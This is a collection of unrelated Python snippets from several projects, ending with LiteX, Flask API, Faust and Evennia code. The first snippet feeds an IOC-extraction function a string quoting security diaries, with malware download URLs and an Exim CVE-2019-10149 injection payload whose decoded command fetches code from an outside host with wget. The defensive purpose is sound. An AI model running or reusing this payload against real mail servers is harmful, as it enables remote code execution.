def parse(): s = '209.217.225.74 port 80 - hotelesmeflo.com - GET /chachapoyas/wp-content/themes/sketch/msr.exe\n SHA256 hash: a666fd9c896bc010b3fba825441e6c745d65807dfc ( File size: 9,261 bytes\n File description: Flash exploit used by Rig EK on 2019-06-17\n SHA256 hash: 2de435b78240c20dca9ae4c278417f2364849a5d134f5bb1ed1fd5791e3e36c5 ( File size: 354,304 bytes\n File description: Payload sent by Rig EK on 2019-06-17 (AZORult)\n SHA256 hash: a4f9ba5fce183d2dfc4dba4c40155c1a3a1b9427d7e4718ac56e76b278eb10d8 ( File size: 2,952,704 bytes\n File description: Follow-up malware hosted on URL at hotelesmeflo.com on 2019-06-17\n Final words\n\n My infected Windows host\n Published : 2019-06-19\n Last Updated : 2019-06-19 14:34:52 UTC\n by Johannes Ullrich ( (Version: 1)\n\n Thanks to our reader Alex for sharing some of his mail logs with the latest attempts to exploit CVE-2019-10149 ( (aka "Return of the Wizard"). The vulnerability affects Exim and was patched about two weeks ago. There are likely still plenty of vulnerable servers, but it looks like attackers are branching out and are hitting servers not running Exim as well.\n\n A couple of logs from our own mail server (running postfix):\n\n > Jun 19 10:47:10 mail postfix/smtp[19006]: AF4: to=&lt;root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}&gt;, relay=204.51.94.153[204.51.94.153]:25, delay=0.82, delays=0.29/0.03/0.45/0.05, dsn=5.1.1, status=bounced (host 204.51.94.153[204.51.94.153] said: 550 5.1.1 &lt;root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}&gt;: Recipient address rejected: User unknown in virtual alias table (in reply to RCPT TO command))\n\n The exploit is attempting to run the following command:\n\n > /bin/sht-ct &quot;wget 64.50.180.45/tmp/70.91.145.10&quot;\n\n Note that the IP at the end of the command is our mail servers public IP address. The URL does no longer appear to exist and belongs to a server running cPanel.\n\n The beginning of the command may actually be a mistake/typo. I believe the attacker is trying to run sh -ct, which would execute the string (wget..).\n\n ---\n Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute ( Twitter ( ' ioc_finder.find_iocs(s)
class ChangeDtypes(elmdptt.TaskOneToOne): changed_columns = luigi.Parameter() def actual_task_code(self, df: pd.DataFrame): cols = ast.literal_eval(self.changed_columns) for (col_name, col_type) in cols.items(): df[col_name] = df[col_name].astype(col_type) return df
class SimSoC(SoCCore): def __init__(self, clocks, trace_reset=1, auto_precharge=False, with_refresh=True, **kwargs): platform = Platform() sys_clk_freq = clocks['sys']['freq_hz'] SoCCore.__init__(self, platform, clk_freq=sys_clk_freq, ident='LiteX Simulation', cpu_variant='lite', **kwargs) self.submodules.crg = _CRG(platform, clocks.names()) platform.add_debug(self, reset=trace_reset) sdram_module = EM6GA16L(sys_clk_freq, '1:4') pads = platform.request('rpcdram') self.submodules.ddrphy = SimulationPHY(pads, sys_clk_freq=sys_clk_freq, generate_read_data=True) self.add_csr('ddrphy') controller_settings = ControllerSettings() controller_settings.auto_precharge = auto_precharge controller_settings.with_refresh = with_refresh self.add_sdram('sdram', phy=self.ddrphy, module=sdram_module, origin=self.mem_map['main_ram'], size=kwargs.get('max_sdram_size', ), l2_cache_size=kwargs.get('l2_size', 8192), l2_cache_min_data_width=kwargs.get('min_l2_data_width', 128), l2_cache_reverse=False, controller_settings=controller_settings) self.add_constant('MEMTEST_DATA_SIZE', (8 * 1024)) self.add_constant('MEMTEST_ADDR_SIZE', (8 * 1024)) self.add_constant('CONFIG_SIM_DISABLE_BIOS_PROMPT') self.submodules.ddrctrl = LiteDRAMCoreControl() self.add_csr('ddrctrl') self.sync += If(self.ddrctrl.init_done.storage, Finish()) def dump(obj): print() print((' ' + obj.__class__.__name__)) print((' ' + ('-' * len(obj.__class__.__name__)))) d = (obj if isinstance(obj, dict) else vars(obj)) for (var, val) in d.items(): if (var == 'self'): continue print(' {}: {}'.format(var, val)) print(('=' * 80)) dump(clocks) dump(self.ddrphy.settings) dump(sdram_module.geom_settings) dump(sdram_module.timing_settings) print() print(('=' * 80))
class TestOkLChProperties(util.ColorAsserts, unittest.TestCase): def test_lightness(self): c = Color('color(--oklch 0.9 0.5 270 / 1)') self.assertEqual(c['lightness'], 0.9) c['lightness'] = 0.2 self.assertEqual(c['lightness'], 0.2) def test_chroma(self): c = Color('color(--oklch 0.9 0.5 270 / 1)') self.assertEqual(c['chroma'], 0.5) c['chroma'] = 0.1 self.assertEqual(c['chroma'], 0.1) def test_hue(self): c = Color('color(--oklch 0.9 0.5 270 / 1)') self.assertEqual(c['hue'], 270) c['hue'] = 0.1 self.assertEqual(c['hue'], 0.1) def test_alpha(self): c = Color('color(--oklch 0.9 0.5 270 / 1)') self.assertEqual(c['alpha'], 1) c['alpha'] = 0.5 self.assertEqual(c['alpha'], 0.5)
class RendererTests(unittest.TestCase): def _make_app(self): app = FlaskAPI(__name__) ('/_love', methods=['GET']) def love(): return {'test': 'I <3 Python'} return app def test_render_json(self): app = self._make_app() renderer = renderers.JSONRenderer() with app.app_context(): content = renderer.render({'example': 'example'}, MediaType('application/json')) expected = '{"example": "example"}' self.assertEqual(content, expected) def test_render_json_with_indent(self): app = self._make_app() renderer = renderers.JSONRenderer() with app.app_context(): content = renderer.render({'example': 'example'}, MediaType('application/json; indent=4')) expected = '{\n "example": "example"\n}' self.assertEqual(content, expected) def test_render_json_with_custom_encoder(self): class CustomJsonProvider(DefaultJSONProvider): def default(self, o): if isinstance(o, datetime): return o.isoformat() return super().default(o) app = self._make_app() app.json = CustomJsonProvider(app) renderer = renderers.JSONRenderer() date = datetime(2017, 10, 5, 15, 22) with app.app_context(): content = renderer.render(date, MediaType('application/json')) self.assertEqual(content, '"{}"'.format(date.isoformat())) def test_render_browsable_encoding(self): app = FlaskAPI(__name__) ('/_love', methods=['GET']) def love(): return {'test': 'I <3 Python'} with app.test_client() as client: response = client.get('/_love', headers={'Accept': 'text/html'}) html = str(response.get_data()) self.assertTrue(('I &lt;3 Python' in html)) self.assertTrue(('<h1>Love</h1>' in html)) self.assertTrue(('/_love' in html)) def test_render_browsable_encoding_with_markdown(self): app = FlaskAPI(__name__) ('/_foo', methods=['GET']) def foo(): return {'test': 'I <3 Python'} with app.test_client() as client: response = client.get('/_foo', headers={'Accept': 'text/html'}) html = str(response.get_data()) print(html) self.assertTrue(('<h1>Foo</h1>' in html)) self.assertTrue(('<p>Bar:' in html)) self.assertTrue(('<code>qux</code>' in html)) def test_render_browsable_linking(self): app = FlaskAPI(__name__) ('/_happiness', methods=['GET']) def happiness(): return {'url': ' 'a tag': '<br />'} with app.test_client() as client: response = client.get('/_happiness', headers={'Accept': 'text/html'}) html = str(response.get_data()) self.assertTrue(('<a href=" in html)) self.assertTrue(('&lt;br /&gt;' in html)) self.assertTrue(('<h1>Happiness</h1>' in html)) self.assertTrue(('/_happiness' in html)) def test_renderer_negotiation_not_implemented(self): renderer = renderers.BaseRenderer() with self.assertRaises(NotImplementedError) as context: renderer.render(None, None) msg = str(context.exception) expected = '`render()` method must be implemented for class "BaseRenderer"' self.assertEqual(msg, expected)
class Test_Collection(): def table(self, *, app): return MyTable(app, name='name') def test_key_type_bytes_implies_raw_serializer(self, *, app): table = MyTable(app, name='name', key_type=bytes) assert (table.key_serializer == 'raw') .asyncio async def test_init_on_recover(self, *, app): on_recover = AsyncMock(name='on_recover') t = MyTable(app, name='name', on_recover=on_recover) assert (on_recover in t._recover_callbacks) (await t.call_recover_callbacks()) on_recover.assert_called_once_with() .asyncio async def test_on_recovery_completed(self, *, table): table.call_recover_callbacks = AsyncMock() (await table.on_recovery_completed(set(), set())) table.call_recover_callbacks.assert_called_once_with() def test_hash(self, *, table): assert hash(table) .asyncio async def test_on_start(self, *, table): table.changelog_topic = Mock(name='changelog_topic', autospec=Topic, maybe_declare=AsyncMock()) (await table.on_start()) table.changelog_topic.maybe_declare.assert_called_once_with() def test_info(self, *, table): assert (table.info() == {'app': table.app, 'name': table.name, 'store': table._store, 'default': table.default, 'schema': table.schema, 'key_type': table.key_type, 'value_type': table.value_type, 'changelog_topic': table._changelog_topic, 'window': table.window, 'extra_topic_configs': table.extra_topic_configs, 'on_changelog_event': table._on_changelog_event, 'recover_callbacks': table._recover_callbacks, 'partitions': table.partitions, 'recovery_buffer_size': table.recovery_buffer_size, 'standby_buffer_size': table.standby_buffer_size, 'use_partitioner': table.use_partitioner}) def test_persisted_offset(self, *, table): data = table._data = Mock(name='_data') assert (table.persisted_offset(TP1) == data.persisted_offset()) .asyncio async def test_need_active_standby_for(self, *, table): table._data = Mock(name='_data', autospec=Store, need_active_standby_for=AsyncMock()) assert ((await table.need_active_standby_for(TP1)) == table._data.need_active_standby_for.return_value) def test_reset_state(self, *, table): data = table._data = Mock(name='_data', autospec=Store) table.reset_state() data.reset_state.assert_called_once_with() def test_send_changelog(self, *, table): table.changelog_topic.send_soon = Mock(name='send_soon') event = Mock(name='event') table._send_changelog(event, 'k', 'v') table.changelog_topic.send_soon.assert_called_once_with(key='k', value='v', partition=event.message.partition, key_serializer='json', value_serializer='json', callback=table._on_changelog_sent, eager_partitioning=True) def test_send_changelog__custom_serializers(self, *, table): event = Mock(name='event') table.changelog_topic.send_soon = Mock(name='send_soon') table._send_changelog(event, 'k', 'v', key_serializer='raw', value_serializer='raw') table.changelog_topic.send_soon.assert_called_once_with(key='k', value='v', partition=event.message.partition, key_serializer='raw', value_serializer='raw', callback=table._on_changelog_sent, eager_partitioning=True) def test_send_changelog__no_current_event(self, *, table): with pytest.raises(RuntimeError): table._send_changelog(None, 'k', 'v') def test_on_changelog_sent(self, *, table): fut = Mock(name='future', autospec=asyncio.Future) table._data = Mock(name='data', autospec=Store) table._on_changelog_sent(fut) table._data.set_persisted_offset.assert_called_once_with(fut.result().topic_partition, fut.result().offset) def test_on_changelog_sent__transactions(self, *, table): table.app.in_transaction = True table.app.tables = Mock(name='tables') fut = Mock(name='fut') table._on_changelog_sent(fut) table.app.tables.persist_offset_on_commit.assert_called_once_with(table.data, fut.result().topic_partition, fut.result().offset) .asyncio async def test_last_closed_window(self, *, table): assert (table.last_closed_window == 0.0) table.window = Mock(name='window') table._data = {('boo', (1.1, 1.4)): 'BOO', ('moo', (1.4, 1.6)): 'MOO', ('faa', (1.9, 2.0)): 'FAA', ('bar', (4.1, 4.2)): 'BAR'} table._partition_timestamps = {TP1: [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]} table._partition_timestamp_keys = {(TP1, 2.0): [('boo', (1.1, 1.4)), ('moo', (1.4, 1.6)), ('faa', (1.9, 2.0))], (TP1, 5.0): [('bar', (4.1, 4.2))]} def get_stale(limit): def is_stale(timestamp, latest_timestamp): return (timestamp < limit) return is_stale table.window.stale.side_effect = get_stale(4.0) (await table._del_old_keys()) assert (table.last_closed_window == 1.9) .asyncio async def test_del_old_keys__empty(self, *, table): table.window = Mock(name='window') (await table._del_old_keys()) .asyncio async def test_del_old_keys(self, *, table): on_window_close = table._on_window_close = AsyncMock(name='on_window_close') table.window = Mock(name='window') table._data = {('boo', (1.1, 1.4)): 'BOO', ('moo', (1.4, 1.6)): 'MOO', ('faa', (1.9, 2.0)): 'FAA', ('bar', (4.1, 4.2)): 'BAR'} table._partition_timestamps = {TP1: [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]} table._partition_timestamp_keys = {(TP1, 2.0): [('boo', (1.1, 1.4)), ('moo', (1.4, 1.6)), ('faa', (1.9, 2.0))], (TP1, 5.0): [('bar', (4.1, 4.2))]} def get_stale(limit): def is_stale(timestamp, latest_timestamp): return (timestamp < limit) return is_stale table.window.stale.side_effect = get_stale(4.0) (await table._del_old_keys()) assert (table._partition_timestamps[TP1] == [4.0, 5.0, 6.0, 7.0]) assert (table.data == {('bar', (4.1, 4.2)): 'BAR'}) on_window_close.assert_has_calls([call.__bool__(), call(('boo', (1.1, 1.4)), 'BOO'), call.__bool__(), call(('moo', (1.4, 1.6)), 'MOO'), call.__bool__(), call(('faa', (1.9, 2.0)), 'FAA')]) table.last_closed_window = 8.0 table.window.stale.side_effect = get_stale(6.0) (await table._del_old_keys()) assert (not table.data) .asyncio async def test_del_old_keys_non_async_cb(self, *, table): on_window_close = table._on_window_close = Mock(name='on_window_close') table.window = Mock(name='window') table._data = {('boo', (1.1, 1.4)): 'BOO', ('moo', (1.4, 1.6)): 'MOO', ('faa', (1.9, 2.0)): 'FAA', ('bar', (4.1, 4.2)): 'BAR'} table._partition_timestamps = {TP1: [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]} table._partition_timestamp_keys = {(TP1, 2.0): [('boo', (1.1, 1.4)), ('moo', (1.4, 1.6)), ('faa', (1.9, 2.0))], (TP1, 5.0): [('bar', (4.1, 4.2))]} def get_stale(limit): def is_stale(timestamp, latest_timestamp): return (timestamp < limit) return is_stale table.window.stale.side_effect = get_stale(4.0) (await table._del_old_keys()) assert (table._partition_timestamps[TP1] == [4.0, 5.0, 6.0, 7.0]) assert (table.data == {('bar', (4.1, 4.2)): 'BAR'}) on_window_close.assert_has_calls([call(('boo', (1.1, 1.4)), 'BOO'), call(('moo', (1.4, 1.6)), 'MOO'), call(('faa', (1.9, 2.0)), 'FAA')]) table.last_closed_window = 8.0 table.window.stale.side_effect = get_stale(6.0) (await table._del_old_keys()) assert (not table.data) .asyncio async def test_on_window_close__default(self, *, table): assert (table._on_window_close is None) (await table.on_window_close(('boo', (1.1, 1.4)), 'BOO')) .parametrize('source_n,change_n,expect_error', [(3, 3, False), (3, None, False), (None, 3, False), (3, 6, True), (6, 3, True)]) def test__verify_source_topic_partitions(self, source_n, change_n, expect_error, *, app, table): event = Mock(name='event', autospec=Event) tps = {event.message.topic: source_n, table.changelog_topic.get_topic_name(): change_n} app.consumer.topic_partitions = Mock(side_effect=tps.get) if expect_error: with pytest.raises(PartitionsMismatch): table._verify_source_topic_partitions(event.message.topic) else: table._verify_source_topic_partitions(event.message.topic) .asyncio async def test_clean_data(self, *, table): table._should_expire_keys = Mock(name='_should_expire_keys') table._should_expire_keys.return_value = False (await table._clean_data(table)) table._should_expire_keys.return_value = True table._del_old_keys = AsyncMock(name='_del_old_keys') def on_sleep(secs, **kwargs): if (table.sleep.call_count > 2): table._stopped.set() table.sleep = AsyncMock(name='sleep', side_effect=on_sleep) (await table._clean_data(table)) table._del_old_keys.assert_called_once_with() table.sleep.assert_called_with(pytest.approx(table.app.conf.table_cleanup_interval, rel=0.1)) def test_should_expire_keys(self, *, table): table.window = None assert (not table._should_expire_keys()) table.window = Mock(name='window', autospec=Window) table.window.expires = 3600 assert table._should_expire_keys() def test_join(self, *, table): table._join = Mock(name='join') ret = table.join(User.id, User.name) table._join.assert_called_once_with(joins.RightJoin(stream=table, fields=(User.id, User.name))) assert (ret is table._join()) def test_left_join(self, *, table): table._join = Mock(name='join') ret = table.left_join(User.id, User.name) table._join.assert_called_once_with(joins.LeftJoin(stream=table, fields=(User.id, User.name))) assert (ret is table._join()) def test_inner_join(self, *, table): table._join = Mock(name='join') ret = table.inner_join(User.id, User.name) table._join.assert_called_once_with(joins.InnerJoin(stream=table, fields=(User.id, User.name))) assert (ret is table._join()) def test_outer_join(self, *, table): table._join = Mock(name='join') ret = table.outer_join(User.id, User.name) table._join.assert_called_once_with(joins.OuterJoin(stream=table, fields=(User.id, User.name))) assert (ret is table._join()) def test__join(self, *, table): with pytest.raises(NotImplementedError): table._join(Mock(name='join_strategy', autospec=joins.Join)) def test_clone(self, *, table): t2 = table.clone() assert (t2.info() == table.info()) def test_combine(self, *, table): with pytest.raises(NotImplementedError): table.combine(Mock(name='joinable', autospec=Stream)) def test_contribute_to_stream(self, *, table): table.contribute_to_stream(Mock(name='stream', autospec=Stream)) .asyncio async def test_remove_from_stream(self, *, table): (await table.remove_from_stream(Mock(name='stream', autospec=Stream))) def test_new_changelog_topic__window_expires(self, *, table): table.window = Mock(name='window', autospec=Window) table.window.expires = 3600.3 assert (table._new_changelog_topic(retention=None).retention == 3600.3) def test_new_changelog_topic__default_compacting(self, *, table): table._changelog_compacting = True assert table._new_changelog_topic(compacting=None).compacting table._changelog_compacting = False assert (not table._new_changelog_topic(compacting=None).compacting) assert table._new_changelog_topic(compacting=True).compacting def test_new_changelog_topic__default_deleting(self, *, table): table._changelog_deleting = True assert table._new_changelog_topic(deleting=None).deleting table._changelog_deleting = False assert (not table._new_changelog_topic(deleting=None).deleting) assert table._new_changelog_topic(deleting=True).deleting def test_copy(self, *, table): assert (copy(table).info() == table.info()) def test_and(self, *, table): with pytest.raises(NotImplementedError): (table & table) def test__maybe_set_key_ttl(self, *, table): table._should_expire_keys = Mock(return_value=False) table._maybe_set_key_ttl(('k', (100, 110)), 0) table._should_expire_keys = Mock(return_value=True) table._maybe_set_key_ttl(('k', (100, 110)), 0) def test__maybe_del_key_ttl(self, *, table): table._partition_timestamp_keys[(0, 110)] = None table._should_expire_keys = Mock(return_value=False) table._maybe_del_key_ttl(('k', (100, 110)), 0) table._should_expire_keys = Mock(return_value=True) table._maybe_del_key_ttl(('k', (100, 110)), 0) table._partition_timestamp_keys[(0, 110)] = {('k', (100, 110)), ('v', (100, 110))} table._maybe_del_key_ttl(('k', (100, 110)), 0) assert (table._partition_timestamp_keys[(0, 110)] == {('v', (100, 110))}) def test_apply_window_op(self, *, table): self.mock_ranges(table) table._set_key(('k', 1.1), 30) table._set_key(('k', 1.2), 40) table._set_key(('k', 1.3), 50) table._apply_window_op(operator.add, 'k', 12, 300.3) assert (table._get_key(('k', 1.1)) == 42) assert (table._get_key(('k', 1.2)) == 52) assert (table._get_key(('k', 1.3)) == 62) def test_set_del_windowed(self, *, table): ranges = self.mock_ranges(table) table._set_windowed('k', 11, 300.3) for r in ranges: assert (table._get_key(('k', r)) == 11) table._del_windowed('k', 300.3) for r in ranges: assert (table._get_key(('k', r)) is None) def test_window_ranges(self, *, table): table.window = Mock(name='window', autospec=Window) table.window.ranges.return_value = [1, 2, 3] assert (list(table._window_ranges(300.3)) == [1, 2, 3]) def mock_ranges(self, table, ranges=[1.1, 1.2, 1.3]): table._window_ranges = Mock(name='_window_ranges') table._window_ranges.return_value = ranges return ranges def test_relative_now(self, *, table): event = Mock(name='event', autospec=Event) table._partition_latest_timestamp[event.message.partition] = 30.3 assert (table._relative_now(event) == 30.3) def test_relative_now__no_event(self, *, table): with patch('faust.tables.base.current_event') as ce: ce.return_value = None with patch('time.time') as time: assert (table._relative_now(None) is time()) def test_relative_event(self, *, table): event = Mock(name='event', autospec=Event) assert (table._relative_event(event) is event.message.timestamp) def test_relative_event__raises_if_no_event(self, *, table): with patch('faust.tables.base.current_event') as current_event: current_event.return_value = None with pytest.raises(RuntimeError): table._relative_event(None) def test_relative_field(self, *, table): user = User('foo', 'bar') event = Mock(name='event', autospec=Event) event.value = user assert (table._relative_field(User.id)(event) == 'foo') def test_relative_field__raises_if_no_event(self, *, table): with pytest.raises(RuntimeError): table._relative_field(User.id)(event=None) def test_relative_timestamp(self, *, table): assert (table._relative_timestamp(303.3)(Mock(name='event', autospec=Event)) == 303.3) def test_windowed_now(self, *, table): with patch('faust.tables.base.current_event'): table.window = Mock(name='window', autospec=Window) table.window.earliest.return_value = 42 table._get_key = Mock(name='_get_key') table._windowed_now('k') table._get_key.assert_called_once_with(('k', 42)) def test_windowed_timestamp(self, *, table): table.window = Mock(name='window', autospec=Window) table.window.current.return_value = 10.1 assert (not table._windowed_contains('k', 303.3)) table._set_key(('k', 10.1), 101.1) assert (table._windowed_timestamp('k', 303.3) == 101.1) assert table._windowed_contains('k', 303.3) def test_windowed_delta(self, *, table): event = Mock(name='event', autospec=Event) table.window = Mock(name='window', autospec=Window) table.window.delta.return_value = 10.1 table._set_key(('k', 10.1), 101.1) assert (table._windowed_delta('k', 303.3, event=event) == 101.1) .asyncio async def test_on_rebalance(self, *, table): table._data = Mock(name='data', autospec=Store, on_rebalance=AsyncMock()) generation_id = 1 (await table.on_rebalance({TP1}, set(), set(), generation_id)) table._data.on_rebalance.assert_called_once_with({TP1}, set(), set(), generation_id) .asyncio async def test_on_changelog_event(self, *, table): event = Mock(name='event', autospec=Event) table._on_changelog_event = None (await table.on_changelog_event(event)) table._on_changelog_event = AsyncMock(name='callback') (await table.on_changelog_event(event)) table._on_changelog_event.assert_called_once_with(event) def test_label(self, *, table): assert label(table) def test_shortlabel(self, *, table): assert shortlabel(table) def test_apply_changelog_batch(self, *, table): table._data = Mock(name='data', autospec=Store) table.apply_changelog_batch([1, 2, 3]) table._data.apply_changelog_batch.assert_called_once_with([1, 2, 3], to_key=table._to_key, to_value=table._to_value) def test_to_key(self, *, table): assert (table._to_key([1, 2, 3]) == (1, 2, 3)) assert (table._to_key(1) == 1) def test_to_value(self, *, table): v = Mock(name='v') assert (table._to_value(v) is v) def test__human_channel(self, *, table): assert table._human_channel() def test_repr_info(self, *, table): assert (table._repr_info() == table.name) def test_partition_for_key__partitioner(self, *, table, app): table.use_partitioner = True partition = None assert (table.partition_for_key('k') is partition)
class TestGlob(util.PluginTestCase): def test_glob_limit(self): config = self.dedent("\n matrix:\n - name: glob\n default_encoding: utf-8\n glob_pattern_limit: 10\n sources:\n - '{}/**/test-{{1..11}}.txt'\n aspell:\n lang: en\n d: en_US\n hunspell:\n d: en_US\n pipeline: null\n ").format(self.tempdir) self.mktemp('.glob.yml', config, 'utf-8') with self.assertRaises(PatternLimitException): self.assert_spellcheck('.glob.yml', []) def test_glob_no_limit(self): config = self.dedent("\n matrix:\n - name: glob\n default_encoding: utf-8\n glob_pattern_limit: 0\n sources:\n - '{}/**/test-{{1..11}}.txt'\n aspell:\n lang: en\n d: en_US\n hunspell:\n d: en_US\n pipeline: null\n ").format(self.tempdir) self.mktemp('.glob.yml', config, 'utf-8') bad_words = ['helo', 'begn'] good_words = ['yes', 'word'] self.mktemp('test-1.txt', '\n'.join((bad_words + good_words)), 'utf-8') self.assert_spellcheck('.glob.yml', bad_words)
def update_model_folders(): subdirs = [] cnt = 0 for (root, dirs, files) in os.walk(os.path.abspath('./logs')): for dir_name in dirs: if (os.path.basename(dir_name) != 'eval'): subdirs.append(os.path.join(root, dir_name)) cnt += 1 print(subdirs) return (f', {cnt}', gr.Dropdown.update(choices=subdirs))
class Attachment(BaseObject): def __init__(self, api=None, content_type=None, content_url=None, file_name=None, id=None, size=None, thumbnails=None, **kwargs): self.api = api self.content_type = content_type self.content_url = content_url self.file_name = file_name self.id = id self.size = size self.thumbnails = thumbnails for (key, value) in kwargs.items(): setattr(self, key, value) for key in self.to_dict(): if (getattr(self, key) is None): try: self._dirty_attributes.remove(key) except KeyError: continue
class OptionSeriesArearangeSonification(Options): def contextTracks(self) -> 'OptionSeriesArearangeSonificationContexttracks': return self._config_sub_data('contextTracks', OptionSeriesArearangeSonificationContexttracks) def defaultInstrumentOptions(self) -> 'OptionSeriesArearangeSonificationDefaultinstrumentoptions': return self._config_sub_data('defaultInstrumentOptions', OptionSeriesArearangeSonificationDefaultinstrumentoptions) def defaultSpeechOptions(self) -> 'OptionSeriesArearangeSonificationDefaultspeechoptions': return self._config_sub_data('defaultSpeechOptions', OptionSeriesArearangeSonificationDefaultspeechoptions) def enabled(self): return self._config_get(True) def enabled(self, flag: bool): self._config(flag, js_type=False) def pointGrouping(self) -> 'OptionSeriesArearangeSonificationPointgrouping': return self._config_sub_data('pointGrouping', OptionSeriesArearangeSonificationPointgrouping) def tracks(self) -> 'OptionSeriesArearangeSonificationTracks': return self._config_sub_data('tracks', OptionSeriesArearangeSonificationTracks)
class CooldownHandler(): __slots__ = ('data', 'db_attribute', 'obj') def __init__(self, obj, db_attribute='cooldowns'): if (not obj.attributes.has(db_attribute)): obj.attributes.add(db_attribute, {}) self.data = obj.attributes.get(db_attribute) self.obj = obj self.db_attribute = db_attribute self.cleanup() def all(self): return list(self.data.keys()) def ready(self, *args): return (self.time_left(*args, use_int=True) <= 0) def time_left(self, *args, use_int=False): now = time.time() cooldowns = [(self.data[x] - now) for x in args if (x in self.data)] if (not cooldowns): return (0 if use_int else 0.0) left = max(max(cooldowns), 0) return (math.ceil(left) if use_int else left) def add(self, cooldown, seconds): now = time.time() self.data[cooldown] = (now + (max(seconds, 0) if seconds else 0)) set = add def extend(self, cooldown, seconds): time_left = (self.time_left(cooldown) + (seconds if seconds else 0)) self.set(cooldown, time_left) return max(time_left, 0) def reset(self, cooldown): if (cooldown in self.data): del self.data[cooldown] def clear(self): self.data.clear() def cleanup(self): now = time.time() cooldowns = dict(self.data) keys = [x for x in cooldowns.keys() if ((cooldowns[x] - now) < 0)] if keys: for key in keys: del cooldowns[key] self.obj.attributes.add(self.db_attribute, cooldowns) self.data = self.obj.attributes.get(self.db_attribute)
.asyncio class TestTasksCountUsers(): async def test_count_users(self, main_session_manager, workspace_session_manager, send_task_mock: MagicMock): count_users = CountUsersTask(main_session_manager, workspace_session_manager, send_task=send_task_mock) (await count_users.run()) send_task_mock.assert_called()